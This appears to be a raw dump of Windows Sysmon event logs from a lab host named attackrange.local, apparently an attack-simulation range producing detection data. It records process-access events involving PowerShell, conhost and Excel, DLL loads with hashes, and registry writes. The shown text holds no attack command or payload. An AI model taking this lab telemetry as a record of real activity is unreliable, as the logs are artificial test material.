17:30:08.431{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 10341000x80000000000000001529924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001529923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001529922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001529921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529920Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529919Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529918Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529917Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529916Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529915Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 734700x80000000000000001529914Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\msctf.dll10.0.14393.4225 (rs1_release.210127-1811)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=1FD254D30743876981194F7E17ECDB6F,SHA256=0CB67AC140097A888B7ED85C9A31F8967D16661B82557CE5D61FA70A85BDF8B8trueMicrosoft WindowsValid 10341000x80000000000000001529913Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529912Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529911Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001529910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001529909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001529908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001529907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001529906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001529905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001529904Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000001529903Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft WindowsValid 10341000x80000000000000001529902Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}28521328C:\Windows\system32\conhost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001529901Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.400{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001529900Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.400{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15Binary Data 10341000x80000000000000001529899Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529898Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001529897Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001529896Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001529895Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001529894Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001529893Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000001529892Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001529891Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001529890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001529889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001529888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001529887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001529886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001529885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001529884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\ConhostV2.dll10.0.14393.1198 (rs1_release_sec.170427-1353)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXEMD5=C16CC61A395D046B4294C92F7C1FD0C2,SHA256=6B5240C0D6F5C1E87A7713CAB668FA9DB0E54492441979ACBD7EA9323724C1B8trueMicrosoft WindowsValid 734700x80000000000000001529883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.400{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x80000000000000001529882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 